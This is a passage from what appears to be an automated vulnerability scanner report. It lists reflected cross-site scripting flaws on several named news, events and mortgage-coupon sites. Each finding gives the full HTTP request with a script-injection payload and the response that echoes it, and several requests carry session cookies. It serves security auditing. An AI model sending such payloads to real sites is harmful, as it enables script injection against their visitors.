Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90\"><script>alert(1)</script>0368ae71355/feed/" /> ...[SNIP]...
1.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44f2c"><script>alert(1)</script>737289185c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44f2c\"><script>alert(1)</script>737289185c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c"><script>alert(1)</script>737289185c2=1 HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " type="application/rss+xml" title=" O.C. in top three for job growth - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c\"><script>alert(1)</script>737289185c2=1feed/" /> ...[SNIP]...
1.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.cbs6albany.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aef0"><script>alert(1)</script>a10a5ec7939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2aef0"><script>alert(1)</script>a10a5ec7939=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?2aef0"><script>alert(1)</script>a10a5ec7939=1" /> ...[SNIP]...
1.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" /> ...[SNIP]...
1.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... &new=n&search=true&srad=30&srss=&st=any&st_select=event&svt=text&swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&swhen=&swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a> ...[SNIP]...
The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <div id="error_message"> Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'> ...[SNIP]...
The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
1.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" /> ...[SNIP]...
1.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.orangecounty.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" /> ...[SNIP]...
1.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" /> ...[SNIP]...
1.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ed"><script>alert(1)</script>27d26f5a006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?scid=1794971&328ed"><script>alert(1)</script>27d26f5a006=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:14 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308111464447; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:06 GMT;path=/;httponly
Content-Length: 2952
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d57"><script>alert(1)</script>3b3d1a7631b was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfc43'><script>alert(1)</script>24de61d88b7 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:29 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
